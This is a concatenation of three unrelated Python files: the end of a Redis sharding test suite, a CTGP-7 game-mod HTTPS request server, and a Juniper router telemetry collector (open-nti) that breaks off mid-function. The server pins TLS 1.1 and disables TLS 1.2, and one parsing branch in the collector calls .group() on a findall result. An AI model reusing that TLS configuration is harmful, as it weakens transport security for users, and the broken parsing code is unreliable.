for i in range(10):
get_sharded_connection('shard', i, 2).sadd('foo', i)
s0 = redis.Redis(db=14).scard('foo')
s1 = redis.Redis(db=13).scard('foo')
self.assertTrue(s0 < 10)
self.assertTrue(s1 < 10)
self.assertEqual(s0 + s1, 10)
def test_count_visit(self):
shards = {'db':13}, {'db':14}
self.conn.set('config:redis:unique', json.dumps({'db':15}))
for i in range(16):
self.conn.set('config:redis:unique:%s'%i, json.dumps(shards[i&1]))
for i in range(100):
count_visit(str(uuid.uuid4()))
base = 'unique:%s'%date.today().isoformat()
total = 0
for c in shards:
conn = redis.Redis(**c)
keys = conn.keys(base + ':*')
for k in keys:
cnt = conn.scard(k)
total += cnt
self.assertEqual(total, 100)
self.assertEqual(self.conn.get(base), b'100')
def test_sharded_search(self):
_fake_shards_for(self.conn, 'search', 2, 2)
docs = 'hello world how are you doing'.split(), 'this world is doing fine'.split()
for i in range(50):
c = get_sharded_connection('search', i, 2)
index_document(c, i, docs[i&1], {'updated':time.time() + i, 'id':i, 'created':time.time() + i})
r = search_and_sort(c, docs[i&1], sort='-id')
self.assertEqual(r[1][0], str(i).encode())
total = 0
for shard in (0,1):
count = search_get_values(get_redis_connection('search:%s'%shard),['this', 'world'], num=50)[0]
total += count
self.assertTrue(count < 50)
self.assertTrue(count > 0)
self.assertEqual(total, 25)
count, r, id = get_shard_results('search', 2, ['world', 'doing'], num=50)
self.assertEqual(count, 50)
self.assertEqual(count, len(r))
self.assertEqual(get_shard_results('search', 2, ['this', 'doing'], num=50)[0], 25)
count, r, id = get_shard_results_thread('search', 2, ['this', 'doing'], num=50)
self.assertEqual(count, 25)
self.assertEqual(count, len(r))
r.sort(key=lambda x:x[1], reverse=True)
r = list(zip(*r))[0]
count, r2, id = search_shards('search', 2, ['this', 'doing'])
self.assertEqual(count, 25)
self.assertEqual(len(r2), 20)
sr2 = set(r2)
sr = set(r)
self.assertEqual(len(sr2 & sr), len(sr2))
def test_sharded_follow_user(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
sharded_timelines['profile:1'].zadd('profile:1', {1: time.time()})
for u2 in range(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, {u2: time.time() + u2})
_follow_user(self.conn, 1, u2)
_follow_user(self.conn, u2, 1)
self.assertEqual(self.conn.zcard('followers:1'), 9)
self.assertEqual(self.conn.zcard('following:1'), 9)
self.assertEqual(sharded_timelines['home:1'].zcard('home:1'), 9)
for db in range(14, 10, -1):
self.assertTrue(len(list(redis.Redis(db=db).keys())) > 0)
for u2 in range(2, 11):
self.assertEqual(self.conn.zcard('followers:%i'%u2), 1)
self.assertEqual(self.conn.zcard('following:%i'%u2), 1)
self.assertEqual(sharded_timelines['home:%i'%u2].zcard('home:%i'%u2), 1)
def test_sharded_follow_user_and_syndicate_status(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
_fake_shards_for(self.conn, 'followers', 4, 4)
sharded_followers.shards = 4
sharded_timelines['profile:1'].zadd('profile:1', {1: time.time()})
for u2 in range(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, {u2: time.time() + u2})
follow_user(self.conn, 1, u2)
follow_user(self.conn, u2, 1)
allkeys = defaultdict(int)
for db in range(14, 10, -1):
c = redis.Redis(db=db)
for k in list(c.keys()):
allkeys[k] += c.zcard(k)
for k, v in allkeys.items():
part, _, owner = k.partition(b':')
if part in (b'following', b'followers', b'home'):
self.assertEqual(v, 9 if owner == b'1' else 1)
elif part == b'profile':
self.assertEqual(v, 1)
self.assertEqual(len(sharded_zrangebyscore('followers', 4, 'followers:1', '0', 'inf', 100)), 9)
syndicate_status(1, {'11':time.time()})
self.assertEqual(len(sharded_zrangebyscore('timelines', 8, 'home:2', '0', 'inf', 100)), 2)
if __name__ == '__main__':
unittest.main()
|
CTGP7ServerHandler.py
|
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import threading
import ssl
from urllib import parse
import bson
import sqlite3
import datetime
import os
import traceback
import subprocess
from .CTGP7Requests import CTGP7Requests
from .CTGP7ServerDatabase import CTGP7ServerDatabase
from .CTGP7CtwwHandler import CTGP7CtwwHandler
class CTGP7ServerHandler:
logging_lock = threading.Lock()
debug_mode = False
myself = None
loggerCallback = lambda x : x
@staticmethod
def logMessageToFile(message):
if (CTGP7ServerHandler.debug_mode):
print(message)
else:
if (CTGP7ServerHandler.loggerCallback is not None):
CTGP7ServerHandler.loggerCallback(message)
class PostHandler(BaseHTTPRequestHandler):
def do_POST(self):
timeNow = datetime.datetime.now()
connDataLen = int(self.headers['Content-Length'])
connData = self.rfile.read(connDataLen)
outputData = {}
logStr = "--------------------\n"
logStr += "Timestamp: {}\n".format(timeNow.isoformat())
try:
process = subprocess.Popen(["./encbsondocument", "d"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
process.stdin.write(connData)
process.stdin.flush()
connData = process.stdout.read()
process.wait()
if (process.returncode != 0):
raise Exception("Couldn't decrypt message: {}".format(process.returncode))
inputData = bson.loads(connData)
if not "_CID" in inputData or not "_seed" in inputData:
raise Exception("Input is missing: cID: {}, seed: {}".format(not "_CID" in inputData, not "_seed" in inputData))
reqConsoleID = inputData["_CID"]
logStr += "Console ID: 0x{:016X}\n".format(reqConsoleID)
solver = CTGP7Requests(CTGP7ServerHandler.myself.database, CTGP7ServerHandler.myself.ctwwHandler, inputData, CTGP7ServerHandler.debug_mode, reqConsoleID)
outputData.update(solver.solve())
logStr += solver.info
outputData["_CID"] = reqConsoleID
outputData["_seed"] = inputData["_seed"]
outputData["res"] = 0
except Exception:
outputData["res"] = -1
traceback.print_exc()
process = subprocess.Popen(["./encbsondocument", "e"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
process.stdin.write(bson.dumps(outputData))
process.stdin.flush()
connOutData = process.stdout.read()
process.wait()
if (process.returncode != 0):
connOutData = b'\x00\x00\x00\x00' # wtf?
connOutLen = len(connOutData)
self.send_response(200)
self.send_header('Content-Type',
'"application/octet-stream"')
self.send_header("Content-Length", connOutLen)
self.end_headers()
self.wfile.write(connOutData)
elap = datetime.datetime.now() - timeNow
logStr += "Elapsed: {:.3f}ms\n".format(elap.seconds * 1000 + elap.microseconds / 1000)
logStr += "--------------------\n"
with CTGP7ServerHandler.logging_lock:
CTGP7ServerHandler.logMessageToFile(logStr)
def log_message(self, format, *args):
if (CTGP7ServerHandler.debug_mode):
BaseHTTPRequestHandler.log_message(self, format, *args)
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
def __init__(self, isDebugOn: bool):
CTGP7ServerHandler.debug_mode = isDebugOn
CTGP7ServerHandler.myself = self
self.database = CTGP7ServerDatabase()
self.database.connect()
self.ctwwHandler = CTGP7CtwwHandler(self.database)
server_thread = threading.Thread(target=self.server_start)
server_thread.daemon = True
server_thread.start()
def terminate(self):
self.database.disconnect()
self.database = None
self.ctwwHandler = None
CTGP7ServerHandler.myself = None
print("CTGP-7 server terminated.")
def server_start(self):
self.server = self.ThreadingSimpleServer(("", 64333), self.PostHandler)
context = ssl.SSLContext(protocol=ssl.PROTOCOL_TLSv1_1)
context.options |= ssl.OP_NO_TLSv1_2
context.load_cert_chain('RedYoshiBot/server/data/server.pem')
self.server.socket = context.wrap_socket(self.server.socket, server_side=True)
print("CTGP-7 server started.")
self.server.serve_forever()
|
open-nti.py
|
#!/usr/bin/env python
# coding: utf-8
# Authors: efrain@juniper.net psagrera@juniper.net
# Version 2.0 20160124
# root@ocst-2-geo:/opt/open-nti# make cron-show
# docker exec -it opennti_con /usr/bin/python /opt/open-nti/startcron.py -a show -c "/usr/bin/python /opt/open-nti/open-nti.py -s"
# * * * * * /usr/bin/python /opt/open-nti/open-nti.py -s --tag evo
# Version 2.1
# add RE shell output support:
# top -b -n 1 | shell
from datetime import datetime # In order to retreive time and timespan
from datetime import timedelta # In order to retreive time and timespan
from influxdb import InfluxDBClient
#from pyez_mock import mocked_device, rpc_reply_dict
from jnpr.junos import *
from jnpr.junos import Device
from jnpr.junos.exception import *
from jnpr.junos.utils.start_shell import StartShell
from lxml import etree # Used for xml manipulation
from pprint import pformat
from pprint import pprint
import argparse # Used for argument parsing
import json
import logging
import logging.handlers
import os # For exec to work
import pprint
import re # For regular expression usage
import requests
import string
import string # For split multiline script into multiple lines
import StringIO # Used for file read/write
import sys # For exec to work
import threading
import time
import xmltodict
import yaml
import copy
logging.getLogger("paramiko").setLevel(logging.INFO)
logging.getLogger("ncclient").setLevel(logging.WARNING) # In order to remove http request from ssh/paramiko
logging.getLogger("requests").setLevel(logging.INFO)
logging.getLogger("urllib3").setLevel(logging.WARNING) # In order to remove http request from InfluxDBClient
####################################################################################
####################################################################################
# Defining the classes and procedures used later on the script
####################################################################################
####################################################################################
def convert_variable_type(var):
try:
result = int(var)
return result
except Exception as e:
pass
try:
result = float(var)
return result
except Exception as e:
pass
return var # I guess that is a string
def check_db_status():
# if the db is not found, then try to create it
try:
dbclient = InfluxDBClient(db_server, db_port, db_admin, db_admin_password)
dblist = dbclient.get_list_database()
db_found = False
for db in dblist:
if db['name'] == db_name:
db_found = True
if not(db_found):
logger.info('Database <%s> not found, trying to create it', db_name)
dbclient.create_database(db_name)
return True
except Exception as e:
logger.error('Error querying open-nti database: %s', e)
return False
#def get_latest_datapoints(**kwargs):
#
# dbclient = InfluxDBClient(db_server, db_port, db_admin, db_admin_password)
# dbclient.switch_database(db_name)
# results = {}
# if db_schema == 1:
# query = "select * from /%s\./ ORDER BY time DESC limit 1 " % (kwargs['host'])
# elif db_schema == 2:
# query = "select * from \"%s\" WHERE device = '%s' GROUP BY * ORDER BY time DESC limit 1 " % ('jnpr.collector',kwargs['host'])
# elif db_schema == 3:
# query = "select * from // WHERE device = '%s' GROUP BY * ORDER BY time DESC limit 1 " % (kwargs['host'])
# else:
# logger.error("ERROR: Unknown db_schema: <%s>", db_schema)
# return results
#
# results = dbclient.query(query)
# return results
def get_target_hosts():
my_target_hosts = {}
for host in sorted(hosts.keys()):
for tag in tag_list:
for hosts_tag in hosts[host].split():
if re.search(tag, hosts_tag, re.IGNORECASE):
my_target_hosts[host] = 1
return my_target_hosts.keys()
def get_target_commands(my_host):
my_host_tags = hosts[my_host]
my_target_commands = {}
for group_command in sorted(general_commands.keys()):
for my_host_tag in my_host_tags.strip().split():
for command_tag in general_commands[group_command]["tags"].split():
if re.search(my_host_tag, command_tag, re.IGNORECASE):
if "commands" in general_commands[group_command].keys():
for cmd in general_commands[group_command]["commands"].strip().split("\n"):
my_target_commands[cmd] = 1
return my_target_commands.keys()
def get_credentials(my_host):
my_host_tags = hosts[my_host]
my_target_credentials = {}
for credential in sorted(credentials.keys()):
for my_host_tag in my_host_tags.strip().split():
for credential_tag in credentials[credential]["tags"].split():
if re.search(my_host_tag, credential_tag, re.IGNORECASE):
if ("username" in credentials[credential].keys()):
if ("method" in credentials[credential].keys()):
if (credentials[credential]["method"] == "key"):
if ("key_file" in credentials[credential].keys()):
return credentials[credential]["username"], "", credentials[credential]["method"], credentials[credential]["key_file"]
else:
logger.error("Missing key_file information")
sys.exit(0)
elif (credentials[credential]["method"] == "enc_key"):
if ("key_file" in credentials[credential].keys()):
if ("password" in credentials[credential].keys()):
return credentials[credential]["username"], credentials[credential]["password"], credentials[credential]["method"], credentials[credential]["key_file"]
else:
logger.error("Missing password information")
sys.exit(0)
else:
logger.error("Missing key_file information")
elif (credentials[credential]["method"] == "password"):
return credentials[credential]["username"], credentials[credential]["password"], credentials[credential]["method"], ""
else:
logger.error("Unknown authentication method found")
sys.exit(0)
else:
if ("password" in credentials[credential].keys()):
return credentials[credential]["username"], credentials[credential]["password"], "password", ""
else:
logger.error("Missing password information")
sys.exit(0)
else:
logger.error("Missing username information")
sys.exit(0)
def execute_command(jdevice,command):
format = "text"
command_tmp = command
if re.search("\| display xml", command, re.IGNORECASE):
format = "xml"
command_tmp = command.replace("| display xml","")
elif re.search("\| count", command, re.IGNORECASE):
format = "txt-filtered"
command_tmp = command.split("|")[0]
elif re.search("\| shell", command, re.IGNORECASE):
# This is the shell commmand supposed to run on RE Linux shell
ss = StartShell(jdevice)
ss.open()
command_tmp = command.split("|")[0]
command_result = ss.run(command_tmp)
return command_result[1]
try:
# Remember... all rpc must have format=xml at execution time,
command_result = jdevice.rpc.cli(command_tmp, format="xml")
except RpcError as err:
rpc_error = err.__repr__()
logger.error("Error found on <%s> executing command: %s, error: %s:", jdevice.hostname, command ,rpc_error)
return False
if format == "text":
# We need to confirm that root tag in command_result is <output> if not then raise exception and skip
return command_result.text
elif format == "xml":
return etree.tostring(command_result)
elif format == "txt-filtered":
operations = command.split("|")[1:]
result_tmp = command_result.text
lines=result_tmp.strip().split('\n')
for operation in operations:
logger.info("Processing <%s>", operation )
if re.search("count", operation, re.IGNORECASE):
result = "Count: %s lines" % len(lines)
logger.debug("Count result: <%s>", result )
return result
match = re.search("match (.*)", operation, re.IGNORECASE)
if match:
regex = match.group(1).strip()
logger.debug("Found regex: <%s>", regex )
lines_filtered = []
for line in lines:
if re.search(regex, line, re.IGNORECASE):
lines_filtered.append(line)
lines = lines_filtered
logger.debug("Filtered result:\n%s", "\n".join(lines_filtered) )
match = re.search("except (.*)", operation, re.IGNORECASE)
if match:
regex = match.group(1).strip()
logger.debug("Found regex: <%s>", regex )
lines_filtered = []
for line in lines:
if re.search(regex, line, re.IGNORECASE):
pass
else:
lines_filtered.append(line)
lines = lines_filtered
logger.debug("Filtered result:\n%s", "\n".join(lines_filtered) )
return "\n".join(lines)
def eval_variable_name(variable,**kwargs):
keys={}
if 'keys' in kwargs.keys():
# This is due dict are mutable and a normal assigment does NOT copy the value, it copy the reference
keys=copy.deepcopy(kwargs['keys'])
if db_schema == 3:
for key in keys.keys():
variable = variable.replace("$"+key,"")
variable = variable.replace("..",".")
variable = variable.replace("$host","")
variable = re.sub(r"^\.", "", variable)
return variable, variable
if db_schema == 2:
for key in keys.keys():
variable = variable.replace("$"+key,"")
variable = variable.replace("..",".")
variable = variable.replace("$host","")
variable = re.sub(r"^\.", "", variable)
return "jnpr.collector", variable
else: # default db_schema (option 1) open-nti legacy
for key in keys.keys():
variable = variable.replace("$"+key,keys[key])
variable = variable.replace("$host",kwargs['host'])
if 'pid' in kwargs.keys():
variable = variable.replace("$pid",kwargs['pid'])
# the host replacement should be move it to other place
return variable, variable
def eval_tag_name(variable,**kwargs):
for key in kwargs:
variable = variable.replace("$"+key,kwargs[key])
return variable
# Code added by Haofeng to deal with humman readable bytes, esp for Linux Based EVO system
# on 5/7/2021
def eval_variable_value(value,**kwargs):
#logger.info('Get value %s', value)
if (kwargs["type"] == "integer"):
if value[-1] == "t":
temp = int(float(value[0:-1])*1099511627776)
return int(float(value[0:-1])*1099511627776)
elif value[-1] == "g":
temp = int(float(value[0:-1])*1073741824)
return int(float(value[0:-1])*1073741824)
elif value[-1] == "m":
return int(float(value[0:-1])*1048576)
elif value[-1] == "k":
return int(float(value[0:-1])*1024)
else:
return int(float(value))
elif kwargs["type"] == "string":
return value
else:
logger.error('An unkown variable-type found: %s', kwargs["type"])
return value
# This code won't work
# def eval_variable_value(value,**kwargs):
# if (kwargs["type"] == "integer"):
# value = re.sub('G','000000000',value)
# value = re.sub('M','000000',value)
# value = re.sub('K','000',value)
# return(int(float(value)))
# elif kwargs["type"] == "string":
# return value
# else:
# logger.error('An unkown variable-type found: %s', kwargs["type"])
# return value
def insert_datapoints(datapoints):
dbclient = InfluxDBClient(db_server, db_port, db_admin, db_admin_password)
dbclient.switch_database(db_name)
logger.info('Inserting into database the following datapoints:')
logger.info(pformat(datapoints))
response = dbclient.write_points(datapoints)
def get_metadata_and_add_datapoint(datapoints,**kwargs):
value_tmp = kwargs['value_tmp']
host = kwargs['host']
#latest_datapoints=kwargs['latest_datapoints']
match={}
if 'match' in kwargs.keys():
# This is due dict are mutable and a normal assigment does NOT copy the value, it copy the reference
match=copy.deepcopy(kwargs['match'])
kpi_tags={}
if 'kpi_tags' in kwargs.keys():
# This is due dict are mutable and a normal assigment does NOT copy the value, it copy the reference
kpi_tags=copy.deepcopy(kwargs['kpi_tags'])
# Need to double check if with latest improvements key variable is not used anymore
# key=''
# if 'key' in kwargs.keys():
# key=kwargs['key']
keys={}
if 'keys' in kwargs.keys():
# This is due dict are mutable and a normal assigment does NOT copy the value, it copy the reference
keys=copy.deepcopy(kwargs['keys'])
for key_name in keys.keys():
kpi_tags[key_name] = keys[key_name]
# Resolving the variable name
value = convert_variable_type(value_tmp)
variable_name, kpi_tags['kpi'] = eval_variable_name(match["variable-name"],host=host,keys=keys)
# Calculating delta values (only applies for numeric values)
#delta = 0
#latest_value = ''
#if (type (value) != str):
#
# points=[]
# if (db_schema == 1):
# points = list(latest_datapoints.get_points(measurement = variable_name))
# elif (db_schema == 2):
# points = list(latest_datapoints.get_points(measurement = 'jnpr.collector', tags=kpi_tags))
# elif (db_schema == 3):
# points = list(latest_datapoints.get_points(measurement = kpi_tags['kpi'], tags=kpi_tags))
# else:
# logger.error("ERROR: Unknown db_schema: <%s>", db_schema)
#
# if len(points) == 1:
# latest_value = points[0]['value']
# delta = value - convert_variable_type(latest_value)
# logger.debug("Delta found : points <%s> latest_value <%s>", points,latest_value)
# elif len(points) == 0:
# delta = value
# logger.debug("No latest datapoint found for <%s>", kpi_tags)
# else:
# logger.error("ERROR: Latest datapoint query returns more than one match : <%s>", points)
#
# if type (value) == int:
# delta = int(delta)
# elif type (value) == float:
# delta = float(delta)
#else:
# delta = 'N/A'
# Getting all tags related to the kpi
# if 'tags' in match.keys():
# for tag in match['tags']:
# tag_name = tag.keys()[0] # We asume that this dict only has one key
# tag_value = eval_tag_name(tag[tag_name],host=host,key=key)
# # this need to be updated when there is more than one key
# kpi_tags[tag_name] = tag_value
# Building the kpi and append it to the other kpis before database insertion
if type (value) != str:
kpi = {
"measurement": variable_name,
"fields": {
"value": value,
#"delta": delta
}
}
else:
kpi = {
"measurement": variable_name,
"fields": {
"value_str": value,
#"delta_str": delta
}
}
kpi["tags"] = kpi_tags
datapoints.append(copy.deepcopy(kpi))
#def parse_result(host,target_command,result,datapoints,latest_datapoints,kpi_tags):
def parse_result(host,target_command,result,datapoints,kpi_tags):
parser_found = False
for junos_parser in junos_parsers:
regex_command = junos_parser["parser"]["regex-command"]
if re.search(regex_command, target_command, re.IGNORECASE):
parser_found = True
matches = junos_parser["parser"]["matches"]
timestamp = str(int(datetime.today().strftime('%s')))
for match in matches:
try:
if match["method"] == "xpath":
# Load xml data
xml_data = etree.fromstring(result)
if match["type"] == "single-value":
try:
logger.debug('[%s]: Looking for a match: %s', host, match["xpath"])
if xml_data.xpath(match["xpath"]):
value_tmp = xml_data.xpath(match["xpath"])[0].text.strip()
logger.debug('[%s]: Match found for (%s) with value (%s)', host, match["xpath"],value_tmp)
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
else:
logger.debug('[%s]: No match found: %s', host, match["xpath"])
if 'default-if-missing' in match.keys():
logger.debug('Inserting default-if-missing value: %s', match["default-if-missing"])
value_tmp = match["default-if-missing"]
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
except Exception, e:
logger.info('[%s]: Exception found.', host)
logging.exception(e)
pass # Notify about the specific problem with the host BUT we need to continue with our list
elif match["type"] == "multi-value":
nodes = xml_data.xpath(match["xpath"])
for node in nodes:
#Look for all posible keys or fields to extract and be used for variable-naming
#key = node.xpath(match["loop"]["key"])[0].text.replace(" ","_").strip()
#print "the key is: " + key
keys = {}
keys_tmp = copy.deepcopy(match["loop"])
#print keys_tmp
if 'sub-matches' in keys_tmp.keys():
del keys_tmp['sub-matches']
for key_tmp in keys_tmp.keys():
keys[key_tmp]=node.xpath(keys_tmp[key_tmp])[0].text.replace(" ","_").strip()
#print keys
for sub_match in match["loop"]["sub-matches"]:
try:
logger.debug('[%s]: Looking for a sub-match: %s', host, sub_match["xpath"])
if node.xpath(sub_match["xpath"]):
if "regex" in sub_match:
value_tmp = node.xpath(sub_match["xpath"])[0].text.strip()
regex = sub_match["regex"]
text_matches = re.search(regex,value_tmp,re.MULTILINE)
if text_matches:
if text_matches.lastindex == len(sub_match["variables"]):
logger.debug('[%s]: We have (%s) matches with this regex %s', host, text_matches.lastindex,regex)
for i in range(0,text_matches.lastindex):
j=i+1
variable_name = eval_variable_name(sub_match["variables"][i]["variable-name"],host=host)
value_tmp = text_matches.group(j).strip()
# Begin function (pero pendiente de ver si variable-type existe y su valor)
if "variable-type" in sub_match["variables"][i]:
value_tmp = eval_variable_value(value_tmp, type=sub_match["variables"][i]["variable-type"])
#get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match["variables"][i],value_tmp=value_tmp,host=host,latest_datapoints=latest_datapoints,kpi_tags=kpi_tags,keys=keys)
get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match["variables"][i],value_tmp=value_tmp,host=host,kpi_tags=kpi_tags,keys=keys)
else:
logger.error('[%s]: More matches found on regex than variables especified on parser: %s', host, regex_command)
else:
logger.debug('[%s]: No matches found for regex: %s', host, regex)
else:
# xpath Attributes with attributes need to be special attention
attributes_matches = re.search('@',sub_match["xpath"])
value_tmp=""
if attributes_matches:
value_tmp = node.xpath(sub_match["xpath"])[0]
logger.debug('[%s]: Submatch found for (%s) with value (%s)', host, sub_match["xpath"],value_tmp)
else:
value_tmp = node.xpath(sub_match["xpath"])[0].text.strip()
logger.debug('[%s]: Submatch found for (%s) with value (%s)', host, sub_match["xpath"],value_tmp)
#get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags,keys=keys)
get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags,keys=keys)
else:
logger.debug('[%s]: No match found: %s', host, match["xpath"])
if 'default-if-missing' in sub_match.keys():
logger.debug('Inserting default-if-missing value: %s', sub_match["default-if-missing"])
value_tmp = sub_match["default-if-missing"]
#get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags,keys=keys)
get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags,keys=keys)
except Exception, e:
logger.info('[%s]: Exception found.', host)
logging.exception(e)
pass # Notify about the specific problem with the host BUT we need to continue with our list
else:
logger.error('[%s]: An unknown match-type found in parser with regex: %s', host, regex_command)
elif match["method"] == "regex": # we need to evaluate a text regex
## for show system process extensive commoand on evo, FPC and RE are nodes.
## we use single-value to deal with RE output
if match["type"] == "single-value":
regex = match["regex"]
text_matches = re.search(regex,result,re.MULTILINE)
if text_matches:
if text_matches.lastindex == len(match["variables"]):
logger.debug('[%s]: We have (%s) matches with this regex %s', host, text_matches.lastindex,regex)
for i in range(0,text_matches.lastindex):
j=i+1
variable_name = eval_variable_name(match["variables"][i]["variable-name"],host=host)
value_tmp = text_matches.group(j).strip()
# Begin function (pero pendiente de ver si variable-type existe y su valor)
if "variable-type" in match["variables"][i]:
value_tmp = eval_variable_value(value_tmp, type=match["variables"][i]["variable-type"])
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match["variables"][i],value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match["variables"][i],value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
else:
logger.error('[%s]: More matches found on regex than variables especified on parser: %s', host, regex_command)
else:
logger.info('[%s]: No matches found for regex: %s', host, regex)
## for show system process extensive commoand on evo, FPC and RE are nodes.
## we use multiple-value to deal with FPC output, and use PID to identify the daemons on different FPC
# 17509 root 17509 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17567 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17568 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17570 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17592 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17593 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17594 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 16532 root 16532 20 0 8.655g 1.346g S 03:36:57 28.1 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 16532 root 16650 20 0 8.655g 1.346g S 03:36:57 28.1 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# regex has to be: \s*([0-9]+)\s+\w+\s+([0-9]+)\s+\S+\s+\d*\S*\s+(\d*\S*)\s+(\d+\S*)\s+\S+\s+\S+\s+\S+\s+(\S+)\s+EvoAftManBt-mai{EvoAftManBt-mai}$
elif match["type"] == "multiple-value":
regex = match["regex"]
text_matches = re.findall(regex, result, re.MULTILINE) # tuples are returned
if text_matches:
text_matches_unique = []
for i in text_matches:
# if the PID = TID, it's the main process. We just monitor this main process
i = list(i)
if i[0] == i[1]:
# remove PID and TID from list
pid = i.pop(0)
i.pop(0)
text_matches_unique.append(i)
for text in text_matches_unique:
# ['17509', '9.806g', '1.371g', '0.0']
# ['16532', '8.655g', '1.346g', '0.0']
# ['17244', '9.738g', '1.346g', '5.6']
# ['17143', '9.928g', '1.384g', '5.9']
for i in range(len(text)):
j=i+1
variable_name = eval_variable_name(match["variables"][i]["variable-name"],host=host,pid=pid)
value_tmp = text_matches.group(j).strip()
# Begin function (pero pendiente de ver si variable-type existe y su valor)
if "variable-type" in match["variables"][i]:
value_tmp = eval_variable_value(value_tmp, type=match["variables"][i]["variable-type"])
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match["variables"][i],value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match["variables"][i],value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
else:
logger.error('[%s]: An unkown match-type found in parser with regex: %s', host, regex_command)
else:
logger.error('[%s]: An unkown method found in parser with regex: %s', host, regex_command)
except Exception, e:
logger.info('[%s]: Exception found.', host)
logging.exception(e)
pass # Notify about the specific problem with the host BUT we need to continue with our list
if parser_found:
logger.info('[%s]: Parser found and processed, going to next comand.', host)
break
if (not(parser_found)):
logger.error('[%s]: ERROR: Parser not found for command: %s', host, target_command)
def collector(**kwargs):
for host in kwargs["host_list"]:
kpi_tags={}
#latest_datapoints={}
# if ((db_schema == 1) and (not(use_hostname))):
#if (not(use_hostname)):
# latest_datapoints = get_latest_datapoints(host=host)
# logger.debug("Latest Datapoints are:")
# logger.debug(pformat(latest_datapoints))
# kpi_tags = get_host_base_tags(host=host)
# Check host tag to identify what kind of connections will be used (ej junos / others / etc)
if "non_junos_devices" in hosts[host].split():
pass
# Reserved for future purposes
else: # By default it's a junos device
# We need to CATCH errors then print then but we need to continue with next host...
connected = False
logger.info('Connecting to host: %s', host)
target_commands = get_target_commands(host)
timestamp_tracking={}
timestamp_tracking['collector_start'] = int(datetime.today().strftime('%s'))
# Establish connection to hosts
user, passwd, authMethod,authKey_file = get_credentials(host)
if dynamic_args['test']:
#Open an emulated Junos device instead of connecting to the real one
_rpc_reply_dict = rpc_reply_dict()
_rpc_reply_dict['dir'] = BASE_DIR_INPUT
#jdev = mocked_device(_rpc_reply_dict)
# First collect all kpi in datapoints {} then at the end we insert them into DB (performance improvement)
connected = True
else:
if authMethod in "key":
jdev = Device(user=user, host=host, ssh_private_key_file=authKey_file, gather_facts=False, auto_probe=True, port=22)
elif authMethod in "enc_key":
jdev = Device(user=user, host=host, ssh_private_key_file=authKey_file, password=passwd, gather_facts=False, auto_probe=True, port=22)
else: # Default is
jdev = Device(user=user, host=host, password=passwd, gather_facts=False, auto_probe=True, port=22)
for i in range(1, max_connection_retries+1):
try:
jdev.open()
jdev.timeout = default_junos_rpc_timeout
connected = True
break
except Exception, e:
if i < max_connection_retries:
logger.error('[%s]: Connection failed %s time(s), retrying....', host, i)
time.sleep(1)
continue
else:
logging.exception(e)
connected = False # Notify about the specific problem with the host BUT we need to continue with our list
# First collect all kpi in datapoints {} then at the end we insert them into DB (performance improvement)
if connected:
datapoints = []
# By default execute show version in order to get version and platform as default tags for all kpi related to this host
kpi_tags = {}
target_command = 'show version | display xml'
#version_xpath = "//package-information/comment"
#by Haofeng, this //junos-version will work for both JUNOS and EVO
version_xpath = "//junos-version"
product_model_xpath = "//product-model"
logger.info('[%s]: Executing command: %s', host, target_command)
result = execute_command(jdev,target_command)
if result:
logger.debug('[%s]: Parsing command: %s', host, target_command)
xml_data = etree.fromstring(result)
value_tmp = xml_data.xpath(version_xpath)[0].text.strip()
version = re.search('\[(.*?)\]$', value_tmp)
if version:
kpi_tags['version'] = version.group(1)
else:
kpi_tags['version'] = 'unknown'
value_tmp = xml_data.xpath(product_model_xpath)[0].text.strip()
kpi_tags['product-model'] = convert_variable_type(value_tmp)
